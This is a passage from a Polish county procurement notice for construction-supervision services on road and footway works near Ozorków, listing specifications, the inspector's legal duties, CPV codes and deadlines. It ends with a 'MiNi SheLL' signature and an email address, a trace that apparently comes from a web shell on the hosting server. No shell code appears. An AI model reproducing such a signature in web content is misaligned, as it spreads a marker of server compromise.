d.Ogólnych Specyfikacjach Technicznych (0ST) D - 04.08.00 Wyrównanie podbudowy, które stanowią załącznik Nr 11 do SIWZ,
e.Ogólnych Specyfikacjach Technicznych (OST) D-04.04.00-04.04.03.Podbudowy z kruszywa stabilizowanego mechanicznie, które stanowią załącznik Nr 12 do SIWZ
f.Szczegółowych Specyfikacjach Technicznych (SST) D-04.03.01 Oczyszczenie i skropienie warstw konstrukcyjnych, które stanowią załącznik Nr 13 do SIWZ,
g.Szczegółowych Specyfikacjach Technicznych (SST)  D-04.08.01 Wyrównanie podbudowy mieszankami mineralno - asfaltowymi, które stanowią załącznik Nr 14 do SIWZ,
h.Szczegółowych Specyfikacjach Technicznych (SST)  D-05.03.05 Nawierzchnia z betonu asfaltowego, które stanowią załącznik Nr 15 do SIWZ,
i.Szczegółowych Specyfikacjach Technicznych (SST)  D - 04.04.02 Podbudowa z kruszywa łamanego stabilizowanego mechanicznie, które stanowią załącznik Nr 16 do SIWZ.
Zamawiający zaleca, aby Wykonawcy dokonali wizji lokalnej na terenie objętym nadzorem oraz zapoznali się z dokumentacją techniczną oraz kosztorysową, dotyczącą inwestycji objętej usługą nadzoru. Przedmiotowa dokumentacja dostępna jest na stronie Zamawiającego: www.starostwo.zgierz.pl/przetargi Znak postępowania OR.343-84/09, lub w siedzibie Zamawiającego pok. 307,309
Wykonawca zobowiązany jest zapewnić techniczny, finansowy i organizacyjny nadzór inwestorski. Wykonawca, jako przedstawiciel Zamawiającego odpowiedzialny jest za kontrolę ilościową i jakościową wykonanych robót oraz za kontrolę pod względem zgodności wykonywania robót z warunkami technicznymi opisanymi w dokumentacji kosztorysowej, Ogólnych Specyfikacjach Technicznych i Szczegółowych Specyfikacjach Technicznych.
4.Wykonawca zobowiązany jest do: 
1)udziału w czynnościach przekazania wykonawcy Inwestycji terenu inwestorskich;
2)Zakres podstawowych obowiązków i praw inspektora nadzoru wynika z art. 25 i 26 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz. U.z 2006r., Nr  156, poz. 1118 z późn. zm.) i obejmuje w szczególności:
a)reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności realizacji robót z dokumentacją postępowania,
obowiązującymi przepisami i normami oraz zasadami wiedzy technicznej,
b)uzgadnianie z Zamawiającym wszelkich odstępstw i zmian technologii robót, materiałów i urządzeń,  zgłaszanych przez wykonawcę robót, szczególnie w sytuacjach, gdy zmiany te mogą skutkować rozszerzeniem zakresu rzeczowego określonego umową lub podwyższeniem kosztów realizacji robót,
c)sprawdzanie jakości wykonanych robót budowlanych, wbudowanych materiałów, a  w szczególności zapobieganie zastosowaniu wyrobów
 i materiałów budowlanych wadliwych oraz nie dopuszczonych do obrotu i stosowania w budownictwie,
d)sprawdzanie i odbiór robót budowlanych ulegających zakryciu 
i zanikających, uczestniczenie w próbach rozruchu i odbiorach technicznych instalacji i urządzeń technicznych,
e)przygotowanie i stwierdzenie gotowości do odbioru robót oraz udział  w czynnościach odbioru robót,
f)potwierdzanie ilości wykonanych robót,
g)potwierdzanie usunięcia wad stwierdzonych przy odbiorze,
h)sprawdzanie rozliczeń Wykonawcy robót budowlanych i potwierdzanie należnych mu kwot oraz rozliczenie końcowe inwestycji,
i)uczestniczenie w przeglądach gwarancyjnych okresu gwarancji,
j)inne niezbędne czynności konieczne dla prawidłowego sprawowania nadzoru inwestorskiego.
3)udział w naradach technicznych zwoływanych przez Zamawiającego lub Wykonawcę robót budowlanych.
5.Zamawiający wymaga, aby Wykonawca był przedsiębiorcą  w rozumieniu przepisów ustawy z dnia 2 lipca 2004r. o swobodzie działalności gospodarczej (t.j. Dz. U. z 2007r. Nr 155, poz. 1095 ze zm.).
6.Zamawiający zastrzega, że umowa na wykonanie przedmiotowego zamówienia zostanie zawarta dopiero po wyłonieniu wykonawcy na roboty budowlane.
7.Zleceniobiorca ponosi odpowiedzialność za szkody wyrządzone na skutek nie wykonania lub nienależytego wykonania czynności objętych umową, ocenianego w granicach przewidzianych dla umów starannego działania.
8.Termin realizacji inwestycji 21 dni od dnia przekazania terenu.
9.Okres gwarancji na wykonane prace 24 miesiące..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pełnienie funkcji inspektora nadzoru nad zadaniem pn. Przebudowa ciągu pieszego w pasie drogi powiatowej Nr 5128 E ul. Narutowicza w m. Sokolniki Las, gm. Ozorków..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie funkcji inspektora nadzoru nad zadaniem pn. Przebudowa ciągu pieszego w pasie drogi powiatowej Nr 5128 E ul. Narutowicza w m. Sokolniki Las, gm. Ozorków.
Wspólny Słownik Zamówień:  71521000-6
Charakterystyka nadzorowanej inwestycji:
1.Przedmiotem zamówienia jest robota budowlana polegająca na przebudowie ciągu pieszego w pasie drogi powiatowej Nr 5128 E ul. Narutowicza w m. Sokolniki Las, gm. Ozorków. 45233260-9, 
45233262-3.
2.Realizacja przedmiotu zamówienia obejmuje :
1)wykonanie robót związanych z odtworzeniem trasy drogowej i jej punktów wysokościowych przy liniowych robotach ziemnych w szczególności: 
a)sprawdzenie wyznaczenia sytuacyjnego i wysokościowego punktów głównych osi trasy i punktów wysokościowych,
b)uzupełnienie osi trasy dodatkowymi punktami (wyznaczenie osi),
c)wyznaczenie dodatkowych punktów wysokościowych (reperów roboczych),
d)wyznaczenie przekrojów poprzecznych,
e)zastabilizowanie punktów w sposób trwały, ochrona ich przed zniszczeniem oraz oznakowanie w sposób ułatwiający odszukanie i ewentualne odtworzenie
2)wykonanie robót związanych z usunięciem gęstych krzaków, pni i odrostów, na powierzchni 0,15 ha,
3) wykonanie i odbiór robót związanych z wykonaniem i wyprofilowaniem koryta, na chodnikach, oraz  na zjazdach na powierzchni 765,00 m2 , oraz na wjazdach w ulice dochodzące na powierzchni 440,00 m2 ,
4) wykonanie i odbiór robót ziemnych w ilości 285,00 m3 ,
5)  wykonanie i odbiór robót związanych z ustawieniem betonowego obrzeża chodnikowego o wymiarach  100 x 20 x 6 cm na podsypce cementowo - piaskowej z wypełnieniem spoin piaskiem, na długości 940,00 m,  
6)  wykonanie  robót, związanych z wykonaniem nawierzchni z brukowej kostki betonowej grubości 6 cm, kolorowej, na podsypce cementowo - piaskowej, z wypełnieniem spoin piaskiem, na chodniku, na powierzchni 722,50 m2,  
7)  wykonanie robót związanych z wykonywaniem podbudowy  z kruszywa łamanego stabilizowanego mechanicznie gr. 15 cm na zjazdach na powierzchni 17,50 m2 oraz gr. 20 cm na wjazdach w ulice dochodzące na powierzchni 440,00 m2, 
8)  wykonanie robót związanych z wykonaniem wjazdów i wyjazdów z bram z kostki brukowej betonowej, kolorowej, gr. 8 cm na podsypce cementowo - paskowej z wypełnieniem spoin piaskiem,   na powierzchni 17,50 m2, 
9) wykonanie robót związanych z wykonywaniem warstw konstrukcji (warstwa ścieralna gr. 5,0 cm.) nawierzchni z betonu asfaltowego, na ulicach dochodzących na powierzchni 440,00 m2.
3.Wymagania szczegółowe dotyczące wykonania i odbioru robót objętych przedmiotem zamówienia zawarte są w: 
1)Ogólnych Specyfikacjach Technicznych (OST), które stanowią załącznik Nr 5 do SIWZ w skład której wchodzą:
1.OST - wymagania ogólne,
2.OST- chodniki z kostki,
3.OST - koryto,
4.OST- nawierzchnie,
5.OST- obrzeża,
6.OST - podbudowy,
7.OST- przygotowawcze,
8.OST - roboty ziemne,
9.OST - wjazdy i wyjazdy.
2)Szczegółowych Specyfikacjach Technicznych (SST) Odtworzenie trasy i punktów wysokościowych, które stanowią załącznik Nr 6 do SIWZ, w skład której wchodzą:
1.SST - roboty pomiarowe,
2.SST - karczowanie krzaków, pni i odrostów,
3.SST- koryto,
4.SST - roboty ziemne
5.SST- obrzeża, 
6.SST - chodniki z kostki,
7.SST- podbudowa na zjazdach,
8.SST- kostka na zjazdach
9.SST- nawierzchnia
Zamawiający zaleca, aby Wykonawcy dokonali wizji lokalnej na terenie objętym nadzorem oraz zapoznali się z dokumentacją techniczną oraz kosztorysową, dotyczącą inwestycji objętej usługą nadzoru. Przedmiotowa dokumentacja dostępna jest na stronie Zamawiającego: www.starostwo.zgierz.pl/przetargi Znak postępowania OR.343-87/09, lub w siedzibie Zamawiającego pok. 307,309
Wykonawca zobowiązany jest zapewnić techniczny, finansowy i organizacyjny nadzór inwestorski. Wykonawca, jako przedstawiciel Zamawiającego odpowiedzialny jest za kontrolę ilościową i jakościową wykonanych robót oraz za kontrolę pod względem zgodności wykonywania robót z warunkami technicznymi opisanymi w dokumentacji kosztorysowej, Ogólnych Specyfikacjach Technicznych i Szczegółowych Specyfikacjach Technicznych.
4.Wykonawca zobowiązany jest do: 
1) udziału w czynnościach przekazania wykonawcy Inwestycji terenu inwestorskich;
2) Zakres podstawowych obowiązków i praw inspektora nadzoru wynika  z art. 25 i 26 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz.U. z 2006r., Nr  156, poz. 1118 z późn. zm.) i obejmuje w szczególności:
a)reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności realizacji robót z dokumentacją postępowania,
 obowiązującymi przepisami i normami oraz zasadami wiedzy technicznej,
b)uzgadnianie z Zamawiającym wszelkich odstępstw i zmian technologii robót, materiałów i urządzeń,  zgłaszanych przez wykonawcę robót, szczególnie w sytuacjach, gdy zmiany te mogą skutkować rozszerzeniem zakresu rzeczowego określonego umową lub podwyższeniem kosztów realizacji robót,
c)sprawdzanie jakości wykonanych robót budowlanych, wbudowanych materiałów, a  w szczególności zapobieganie zastosowaniu wyrobów
 i materiałów budowlanych wadliwych oraz nie dopuszczonych do obrotu i stosowania w budownictwie,
d)sprawdzanie i odbiór robót budowlanych ulegających zakryciu 
i zanikających, uczestniczenie w próbach rozruchu i odbiorach technicznych instalacji i urządzeń technicznych,
e)przygotowanie i stwierdzenie gotowości do odbioru robót oraz udział  w czynnościach odbioru robót,
f)potwierdzanie ilości wykonanych robót,
g)potwierdzanie usunięcia wad stwierdzonych przy odbiorze,
h)sprawdzanie rozliczeń Wykonawcy robót budowlanych i potwierdzanie należnych mu kwot oraz rozliczenie końcowe inwestycji,
i)uczestniczenie w przeglądach gwarancyjnych okresu gwarancji,
j)inne niezbędne czynności konieczne dla prawidłowego sprawowania nadzoru inwestorskiego.
k)udział w naradach technicznych zwoływanych przez Zamawiającego lub Wykonawcę robót budowlanych.
l)Zamawiający wymaga, aby Wykonawca był przedsiębiorcą  w rozumieniu przepisów ustawy z dnia 2 lipca 2004r. o swobodzie działalności gospodarczej (t.j. Dz. U. z 2007r. Nr 155, poz. 1095 ze zm.).
m)Zamawiający zastrzega, że umowa na wykonanie przedmiotowego zamówienia zostanie zawarta dopiero po wyłonieniu wykonawcy na roboty budowlane.
n)Zleceniobiorca ponosi odpowiedzialność za szkody wyrządzone na skutek nie wykonania lub nienależytego wykonania czynności objętych umową, ocenianego w granicach przewidzianych dla umów starannego działania.
3)Termin realizacji inwestycji 60 dni od dnia zawarcia umowy.
4)Okres gwarancji na wykonane prace 24 miesiące..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com